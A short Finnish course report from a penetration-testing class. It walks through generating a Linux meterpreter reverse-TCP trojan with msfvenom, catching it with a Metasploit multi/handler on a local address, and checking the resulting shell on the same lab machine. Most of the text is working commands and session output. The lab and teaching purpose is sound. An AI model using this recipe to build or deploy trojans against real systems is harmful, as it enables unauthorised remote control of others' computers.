Tuntitehtävä: troijalainen

Troijalaisen tekeminen ja sen testaaminen samalla koneella

Raportissa on vastaus Haaga-Helia Ammattikorkeakoulu Tunkeutumistestaus -opintojakson 6. viikon tuntitehtävään. Kurssi perustuu Tero Karvisen materiaaleihin.

Kirjoittamani materiaali saa muuttaa, jakaa, käyttää ja kopioida GNU General Public License v.3.0 mukaisesti.

Tehtävänanto

Terminal 1
sudo msfconsole
# multi/handler avaa portin, joka kuuntelee vallattuja koneita
use exploit/multi/handler
# hyötykuormaksi reverse shell
set payload linux/x64/meterpreter_reverse_tcp
terminal 2
# katso paikallinen ip-osoite
hostname -I
terminal 1
# aseta paikallinen ip-osoite
set LHOST 10.0.2.15
run
terminal 2
# tarkasta oikea syntaksi
$ msfvenom 2>&1 | less
$ sudo msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.2.15 -f elf -o pentesttrojan
# annetaan käyttäjille suoritusoikeus
$ sudo chmod u+x pentesttrojan 
$ sudo ./pentesttrojan
terminal 1
# uusi sessio avautui
# testi 1
meterpreter > pwd
/home/sami
# testi 2
meterpreter > sysinfo
Computer     : pt.pt
OS           : Debian  (Linux 5.10.0-kali9-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Leave a Reply